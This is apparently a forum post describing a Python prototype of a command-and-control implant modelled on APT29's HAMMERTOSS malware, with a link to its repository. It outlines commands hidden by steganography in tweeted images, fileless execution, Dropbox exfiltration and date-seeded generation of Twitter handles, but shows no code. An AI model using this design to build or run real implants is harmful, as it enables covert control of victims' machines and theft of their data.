So I was reading the report by FireEye on the Russian state-sponsored cyber operator team - APT 29 and their malware named HAMMERTOSS tDiscoverer.
What it did was generate seemingly “random” Twitter handles periodically and use commands embedded in a tweeted image from that handle for C&C.
Basically, their motto is to mimic human behaviour so as not to get caught by next-gen network security solutions.
Naturally, it caught my eye due to the unconventional C2 channel used by them.
I mean sure we have seen social media being used as C2 in real-life by APTs such as the Indian Patchwork team etc but we don’t really see it often do we?
I decided to create a quick prototype in Python 3 demonstrating the implant’s capabilities and also added some extra features. Now, originally I intended to make a C2 framework much like Empire, Faction, Sliver, Covenant etc as I thought it’d be a cool addition to a Red Team operator’s arsenal but I got caught up in some other work so the project never progressed further and development halted.
Full disclosure: The code is messy as hell since I didn’t get time to clean it up but it works. It’s stupid perhaps but it works as intended as of yet.
I’m posting the link to the Github repository in case someday someone might find it useful and create a production C2 framework based on it.
Here’s the link: https://github.com/slaeryan/LARRYCHATTER
Oh and P.S. - Did you know the cute bird of Twitter is named Larry? Chatter of course means communication. Ergo, I thought it’d be appropriate to name the project LARRYCHATTER.
Sure.
Okay so what I did was stupid simple.
The project has two parts namely the LP and the Implant.
On the LP side, there’s not much to explain, it just takes a command from the operator, encrypts the command using a Python crypto lib and then embeds the encrypted command in the an image also fed by the operator before posting the stego image from the Twitter handle whose Developer API tokens have to be fed into the script.
The Implant side is based on web-scraping so as to avoid hard coding any API keys on the Implant side. I use BeautifulSoup lib to scrape the image from the Twitter handle and then proceed to extract the embedded encrypted command from the image, decrypt it and then proceed to perform the intended action on the host. All of this happens without touching the disk.
Dropbox is used for Data exfiltration in the current form. Again, to avoid hard coding the Dropbox API key on the Implant, I pass it along the command embedded in the image separated by a single space.
I’ve also avoided hard coding anything on the Implant side as much as possible since it’s detrimental to OPSEC and it makes the Implant somewhat more resilient.
Regarding the Twitter Handle Generation algorithm. What I’ve made is a simple pseudo-random generator. In other words, not really random but possible to predict with the correct seed. I’ve used the current date as the seed after hashing it and extracting some characters out of the hash. The LP and the Implant will be kept in sync through the use of this algorithm. The end result is that it’s quite difficult to predict the Twitter handle using statistical analysis unlike some DGAs(Domain Generation Algorithm) without reverse-engineering the implant first which as we all know here may not be child’s play making it more resilient.
I hope I’ve touched upon the basic concepts but I’d be happy to provide any additional technical details.